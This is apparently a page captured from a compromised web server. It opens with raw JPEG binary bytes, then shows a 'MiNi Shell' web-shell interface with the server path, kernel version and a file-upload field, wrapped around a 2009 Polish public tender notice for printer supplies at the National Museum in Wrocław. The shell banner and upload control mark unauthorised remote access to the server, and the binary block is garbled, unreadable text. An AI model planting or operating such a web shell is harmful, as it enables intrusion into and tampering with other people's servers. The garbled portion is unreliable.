JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/122072-N-2009.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek  dla Muzeum Narodowego we Wrocławiu i jego oddziałów.</b><br>
<b>Numer ogłoszenia: 122072 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe we Wrocławiu , Pl. Powstańców Warszawy 5, 50-153 Wrocław, woj. dolnośląskie, tel. 071 3435643, 3433308, faks 071 3725159.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnwr.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek  dla Muzeum Narodowego we Wrocławiu i jego oddziałów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy materiałów eksploatacyjnych do drukarek i kserokopiarek: tonerów, tuszy i taśm barwiących na potrzeby Muzeum Narodowego we Wrocławiu i jego oddziałów wg załączonej specyfikacji asortymentowo - ilościowej, stanowiącej załącznik nr 1 do SIWZ.

2.	Zamawiający wymaga zapewnienia realizacji dostawy wszystkich wymienionych w Zał. nr 1 pozycji produktów, brak którejkolwiek pozycji będzie równoznaczny z odrzuceniem oferty.

3.	W celu prawidłowego sporządzenia oferty, wykonawca powinien zapoznać się z oczekiwaniami i wymogami Zamawiającego oraz uzyskać wszystkie niezbędne informacje, co do ryzyka, trudności wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia.

4.	Wymagania dotyczące przedmiotu zamówienia
1)	Przedmiot zamówienia musi odpowiadać określonym przez Zamawiającego parametrom technicznym, użytkowym i jakościowym wskazanym w specyfikacji asortymentowo-ilościowej, stanowiącej załącznik nr1 do SIWZ. 
2)	Materiały eksploatacyjne muszą być fabrycznie nowe (nowo wytworzone w całości), bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, nierefabrykowane. Wszystkie elementy wchodzące w skład materiałów (np. kaseta, bęben światłoczuły, listwa podająca, listwa zbierająca, listwa czyszcząca, wałek grzewczy, wałek dociskowy, głowica drukująca, toner, atrament, tusz) muszą być fabrycznie nowe, nieregenerowane, nierefabrykowane, niewchodzące wcześniej (pierwotnie) w całości ani w części w skład innych materiałów (nieużywane).
3)	Materiały eksploatacyjne muszą posiadać znak firmowy producenta, etykiety w języku polskim zawierające numer katalogowy i termin jego ważności. Za produkt fabrycznie nowy (nowo wytworzony w całości) i nieregenerowany nie uznaje się wyrobu eksploatowanego wcześniej czy przerabianego, w którym jedynie wyczyszczony został pojemnik i ponownie napełniony czy uzupełniony lub wyrobu wykonanego z zastosowaniem używanych elementów.
4)	Przez produkt równoważny Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność tuszu, tonera, wydajność i jakość wydruku) w stosunku do typu zamawianego produktu fabrycznie nowego (nowo wytworzonego w całości), nieregenerowanego, pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony. Wykonawca składając ofertę na produkty równoważne jest zobowiązany zastosować dyspozycje, o której mowa w art. 30 ust.5 Ustawy PZP przez załączenie do oferty specyfikacji technicznej produktu z zaznaczeniem cech potwierdzających równoważność oferty w zakresie oczekiwań zamawiającego: pojemność, wydajność i jakość wydruku.
Wykonawca zobowiązany jest dołączyć do oferty aktualny katalog (wyciąg z katalogu) lub wydruk z katalogu umieszczonego na stronie internetowej z zaznaczeniem artykułów, jakie wykonawca oferuje w postępowaniu (w specyfikacji należy wskazać proponowany produkt, w taki sposób, aby można było zidentyfikować prawidłowo towar równoważny). Katalogi produktów równoważnych muszą zawierać specyfikacje techniczną produktu równoważnego z zaznaczeniem cech potwierdzających równoważność oferty w zakresie oczekiwań zamawiającego: pojemność, wydajność. W przypadku braku takiego katalogu oraz w odniesieniu do artykułów nie występujących w katalogach konieczne jest dołączenie opisu wraz z fotografią wszystkich pozycji z podaniem producentów artykułów lub innych informacji indywidualizujących zaoferowany towar, wraz ze specyfikacją techniczną produktu równoważnego z zaznaczeniem cech potwierdzających równoważność oferty w zakresie oczekiwań zamawiającego: pojemność, wydajność, jakość (próbki wydruków kolorowych).

UWAGA: W przypadku wątpliwości Zamawiającego, co do równoważności oferowanych materiałów eksploatacyjnych do drukarek i kserokopiarek ciężar udowodnienia równoważności spoczywa na Wykonawcy pod rygorem odrzucenia oferty.

5.	W przypadku, gdy z powodu dostarczenia nieodpowiednich tonerów, tuszy i taśm barwiących  nastąpi uszkodzenie urządzenia drukującego, kosztami naprawy, w autoryzowanym serwisie producenta sprzętu, Zamawiający obciąży Wykonawcę.

6.	Podane w specyfikacji asortymentowo-ilościowej (Zał. nr 1 Opis przedmiotu zamówienia) ilości są ilościami określonymi w oparciu o przewidywaną do zużycia, w okresie trwania umowy, ilość poszczególnego asortymentu materiałów eksploatacyjnych. Zamawiający zastrzega sobie prawo do realizacji zmniejszonej lub zwiększonej ilości poszczególnych asortymentów zamówienia, w zależności od potrzeb, wg cen jednostkowych przedstawionych w ofercie; 

7.	Ilość i asortyment towaru Zamawiający będzie podawać Wykonawcy w pisemnym (faksem) lub telefonicznym zamówieniu. Dostawa towaru w terminie 3 dni roboczych od dnia otrzymania przez Wykonawcę (faksu lub zgłoszenia telefonicznego) zamówienia.

8.	Wykonawca będzie dostarczał towar własnym transportem i na własny koszt do siedziby Zamawiającego: Muzeum Narodowego, pl. Powstańców Warszawy 5.

9.	Odbiór towaru następować będzie w obecności przedstawicieli stron, na podstawie faktury VAT wystawionej przez Wykonawcę.

10.	Warunki płatności: przelewem bankowym w terminie 21 dni od dnia dostarczenia Zamawiającemu faktury.

13.	Zamawiający zastrzega sobie prawo rezygnacji z zamówienia niektórych pozycji wymienionych w formularzu cenowym w całości lub części.

14.	Pozostałe warunki podano we wzorze umowy załączonym do niniejszej Specyfikacji Istotnych Warunków  Zamówienia jako załącznik nr 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.19.21.13-6, 30.19.23.00-4, 30.12.51.20-8, 30.12.51.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone  w art. 22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z ubiegania się o zamówienie na podstawie art.24 ust.1 i 2 tej ustawy.

W przetargu mogą wziąć udział wykonawcy, którzy winni spełniać następujące wymagania:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1)	przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, czyli: 

1)	Wykażą, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują co najmniej 2 dostawy, z których każda odpowiada swoim rodzajem i wartością przedmiotowi zamówienia (należy dołączyć wykaz - wypełniony Zał. nr 3 Formularza Ofertowego). Do wykazu należy dołączyć kserokopie (potwierdzone za zgodność z oryginałem przez Wykonawcę)  dokumentów potwierdzających, że wymienione wyżej dostawy wykonane zostały z należytą starannością. 

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie oświadczeń lub dokumentów załączonych do oferty - według zasady spełnia lub nie spełnia. Warunki udziału w postępowaniu zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty i oświadczenia, o których mowa w Dziale IX SIWZ. Ocena złożonych oświadczeń i dokumentów obejmowała będzie ich badanie pod względem formalnoprawnym, a także czy informacje w nich zawarte potwierdzają spełnienie warunków określonych przez Zamawiającego.

Wykonawcy zgodnie z art. 23 ustawy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wymagane jest:
1.	ustanowienie pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć oryginał pełnomocnictwa);
2.	złożenie wraz z ofertą, przez każdego Wykonawcę występującego wspólnie, oświadczenia o niepodleganiu wykluczeniu z postępowania (zał. nr 1a Formularza Ofertowego) oraz udokumentowanie, że razem spełniają wymagania art. 22 ust. 1 dotyczące wiedzy, doświadczenia, potencjału technicznego (wraz z dokumentami potwierdzającymi, zgodnie z zapisem w rozdz. IX SIWZ).
3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie;
4.	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy (art. 141 ustawy Pzp).
5.	Wszelka korespondencja prowadzona będzie z Wykonawcą występującym jako pełnomocnik pozostałych (Lider).
6.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć pisemne porozumienie wszystkich Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowną umowę cywilno-prawną (umowa Konsorcjum). Umowa ta powinna określać: zakres obowiązków każdego z Wykonawców przy realizacji Umowy z Zamawiającym, termin związania umową, na czas nie krótszy niż czas wynikający z Umowy z Zamawiającym, wskazanie Pełnomocnika, zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizacji przedmiotu Umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca jest zobowiązany złożyć wypełniony i podpisany FORMULARZ OFERTOWY, którego wzór załączony jest do niniejszej SIWZ oraz następujące dokumenty: 

1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda złożenia wraz z ofertą: 

1)	Oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp - Załącznik nr 1 Formularza Ofertowego. 

2)	Oświadczenia o niepodleganiu wykluczeniu, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp - Załącznik nr 1a Formularza Ofertowego. 

3)	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert -  dołączyć do Załącznika nr 1 Formularza ofertowego w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawniona do reprezentacji Wykonawcy w obrocie gospodarczym.
W przypadku: 
a) Podmiotów posiadających osobowość prawną jak i spółek prawa handlowego nie posiadających osobowości prawnej - należy załączyć odpis z Krajowego Rejestru Sądowego. 
b) Osób fizycznych wykonujących działalność gospodarczą - należy załączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej.
c) Spółki cywilnej - należy załączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej każdego wspólnika.
d) Konsorcjum - oferta musi zawierać odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej dla każdego z członków konsorcjum osobno. 

4)	Oryginału pełnomocnictwa - dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę (konsorcjum).
a)	dokument pełnomocnictwa dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów złożonych w ofercie,
b)	dokument pełnomocnictwa do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisany przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców.
UWAGA! W przypadku konsorcjum podmioty te są zobowiązane do ustanowienia pełnomocnika a także złożenia zapewnienia (zobowiązania), że za wykonanie umowy będą odpowiadać solidarnie i że przed podpisaniem umowy z Zamawiającym zawrą umowę regulującą zasady ich współpracy (dołączyć do załącznika nr 1 do oferty) - umowa taka może być zawarta już na etapie składania ofert; 
Pełnomocnictwo musi być załączone w oryginale i podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców. Każde pełnomocnictwo powinno wskazywać pełnomocnika i zawierać następujące dane: nazwę przedmiotu zamówienia i Zamawiającego, podmiotu udzielającego pełnomocnictwa (tj. Wykonawcy), datę jego udzielenia oraz podpisy osób upoważnionych do reprezentowania danego Wykonawcy wg zasad określonych w dokumencie rejestrowym, a także informację o zakresie pełnomocnictwa (tj. czy zostało udzielone do reprezentowania w postępowaniu o udzielenie zamówienia, czy też do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum), załączone pełnomocnictwo musi być podpisane przez wszystkich wykonawców, którzy tworzą konsorcjum.

2.	W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, Wykonawcy zobowiązani są do przedłożenia wraz z ofertą: 

1)	Wykazu wykonanych 2 dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń okresowych lub ciągłych wykonywanych dostaw- z których każda odpowiada swoim rodzajem i wartością przedmiotowi zamówienia (należy dołączyć wykaz - wypełniony Załącznik  nr 3 Formularza Ofertowego). 

2)	Referencje lub inne dokumenty potwierdzające, że wymienione wyżej dostawy, wskazane w Załączniku nr 3 Formularza Ofertowego, wykonane zostały z należytą starannością. Należy dołączyć do wykazu Załącznika nr 3 oryginały lub kserokopie potwierdzone za zgodność z oryginałem przez Wykonawcę.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów §2 Rozporządzenia Prezesa rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z nr 87 z 2006 r. poz. 605 z późniejszymi zmianami). 

Uwaga - dokumenty złożone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

Forma dokumentów: wszystkie dokumenty (z wyjątkiem pełnomocnictwa, które Wykonawca składa w oryginale) muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (poświadczenie za zgodność z oryginałem musi być dokonane przez osoby upoważnione do reprezentowania wykonawcy). Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mnwr.art.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław Dział administracyjno-gospodarczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 10:00, miejsce: Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław Dział administracyjno-gospodarczy, pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com